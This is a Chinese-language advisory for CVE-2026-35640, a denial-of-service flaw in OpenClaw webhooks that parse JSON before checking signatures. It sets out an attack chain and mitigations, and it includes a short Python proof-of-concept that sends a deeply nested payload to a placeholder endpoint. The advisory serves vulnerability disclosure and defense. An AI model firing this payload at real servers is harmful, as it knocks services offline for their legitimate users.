CVE-2026-35640 CVSS 5.3 中危

CVE-2026-35640 OpenClaw未授权拒绝服务漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35640

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在 2026.3.25 之前的版本中存在安全漏洞，该漏洞源于程序在验证 Webhook 签名之前会优先解析 JSON 请求体。未经身份验证的远程攻击者可利用此缺陷，向服务器发送特制的恶意 Webhook 请求。由于解析操作发生在签名验证之前，攻击者可以强制服务器执行资源密集型的 JSON 解析任务，从而导致服务器资源耗尽，引发拒绝服务（DoS）。

技术细节

该漏洞属于逻辑设计缺陷，违反了安全开发中“验证优先于处理”的原则。在受影响的 OpenClaw 版本中，处理 Webhook 请求的流程首先接收 HTTP 请求，并立即对请求体中的 JSON 数据进行解析和反序列化。这个过程会消耗 CPU 和内存资源，特别是当 JSON 数据结构复杂或深度嵌套时。只有在解析完成后，系统才会验证请求的签名以确认其合法性。攻击者利用这一时序漏洞，无需持有有效签名即可发送包含恶意构造的大规模 JSON 数据包。服务器在处理这些无效请求时会耗尽资源，无法响应合法用户请求，从而实现拒绝服务攻击。

攻击链分析

STEP 1

侦察

攻击者识别目标网络上运行的 OpenClaw 实例及其 Webhook 接收端点。

STEP 2

武器化

攻击者构造一个特制的 HTTP POST 请求，其中包含高度复杂、体积庞大或深度嵌套的恶意 JSON 数据。

STEP 3

交付

攻击者向目标 OpenClaw 服务的 Webhook 端点发送该恶意请求，无需进行身份认证。

STEP 4

利用

OpenClaw 服务器在未验证签名的情况下，立即消耗 CPU 和内存资源解析恶意 JSON 负载。

STEP 5

影响

服务器资源耗尽，导致服务响应缓慢或完全崩溃，无法处理合法的 Webhook 请求。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

def send_malicious_webhook(url):
    # Craft a deeply nested JSON payload to exhaust parsing resources
    malicious_payload = {"data": "start"}
    for _ in range(10000):
        malicious_payload = {"nested": malicious_payload}

    headers = {
        "Content-Type": "application/json"
        # Signature is not required to trigger the parsing operation
    }

    try:
        print(f"Sending attack payload to {url}...")
        response = requests.post(url, data=json.dumps(malicious_payload), headers=headers, timeout=5)
        print(f"Server responded with status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("Request timed out - possible successful DoS trigger.")
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    target = "http://target-openclaw-server/webhook"
    send_malicious_webhook(target)

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施

如果无法立即升级版本，建议在 Web 应用防火墙（WAF）或负载均衡器上配置严格的速率限制和请求体大小限制，以阻断恶意的大流量请求，减轻服务器压力。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表